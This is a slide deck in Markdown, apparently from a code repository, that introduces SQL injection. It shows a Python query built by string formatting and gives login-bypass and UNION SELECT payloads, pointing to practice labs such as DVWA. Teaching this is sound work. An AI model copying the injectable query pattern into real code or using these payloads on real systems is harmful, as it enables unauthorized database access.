presentations/introduction-to-sql-injection/sql_injection.md

116 lines
2.2 KiB
Markdown
Raw Normal View History

2024-04-11 15:41:37 +02:00
% Introduction to SQL Injection
% Stefan Friese
% 11 April, 2024
---
# Topics
* How an SQL Injection is Created
* How to Exploit an SQL Injection
* SPOILER: How to Prevent an SQL Injection in the Next Presentation
---
## How Does it Happen
An SQL injection occurs when two things come together.
---
### Number 1
2024-04-18 15:56:25 +02:00
An SQL Query as a string embedded in other languages.
2024-04-11 15:41:37 +02:00
2024-04-18 15:56:25 +02:00
```sql
2024-04-11 15:41:37 +02:00
sql_query =
cursor.execute(
"SELECT * FROM users WHERE username = 'admin' \
AND password = 's3cur3P4ssw0rd'"
2024-04-11 15:41:37 +02:00
)
```
---
### Number 2
2024-04-18 15:56:25 +02:00
User input is possible inside a value of type string as a part of said SQL query.
2024-04-11 15:41:37 +02:00
2024-04-18 15:56:25 +02:00
```sql
2024-04-11 15:41:37 +02:00
sql_query =
cursor.execute(
"SELECT * FROM users WHERE username = '%s' AND password = '%s'" \
2024-04-11 15:41:37 +02:00
% (username, password)
)
```
---
2024-04-18 15:56:25 +02:00
## How to Exploit an SQLi Vulnerability
2024-04-11 15:41:37 +02:00
* Close the string through an ending quote
* Continue the query with your own SQL code
2024-04-11 15:41:37 +02:00
---
### Crafting an SQL Query
>```sql
>' or '1'='1' -- -
>```
* Close the existing string with: `'`
* Write a query that equals to True: `1=1`
* End the SQL query through a comment: `-- -`
---
### What Does the Query Look Like
```SQL
SELECT * FROM users WHERE username = '' or '1' = '1' -- - AND password '%s'
```
*Numbers as strings is an SQLite specific thing*
---
### Other Queries
```sql
' UNION SELECT 'a',NULL,NULL,NULL -- -
2024-04-18 15:56:25 +02:00
```
```sql
' UNION SELECT * FROM users WHERE user_id = 1 -- -
2024-04-18 15:56:25 +02:00
```
```sql
' UNION SELECT * FROM users WHERE user_id != 1337 -- -
```
---
## Even More Injection Queries
* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
* [Hacktricks SQL Injection Page](https://book.hacktricks.xyz/pentesting-web/sql-injection)
* [SQLMap](https://github.com/sqlmapproject/sqlmap)
---
## Try for Yourself
2024-04-18 15:56:25 +02:00
* Use the provided [example](./example) inside this presentation's repository.
There is a [readme](./example/README.md) which guides you through the setup.
2024-04-18 15:56:25 +02:00
* Further, try [Damn Vulnerable Web
Application](https://github.com/digininja/DVWA) which you can setup by yourself
or use [Tryhackme's DVWA Room](https://tryhackme.com/r/room/dvwa).
---
2024-04-11 15:41:37 +02:00
# The End
<img src="./images/exploits_of_a_mom.png" alt="Convoluted Code" width="50%" height="auto%">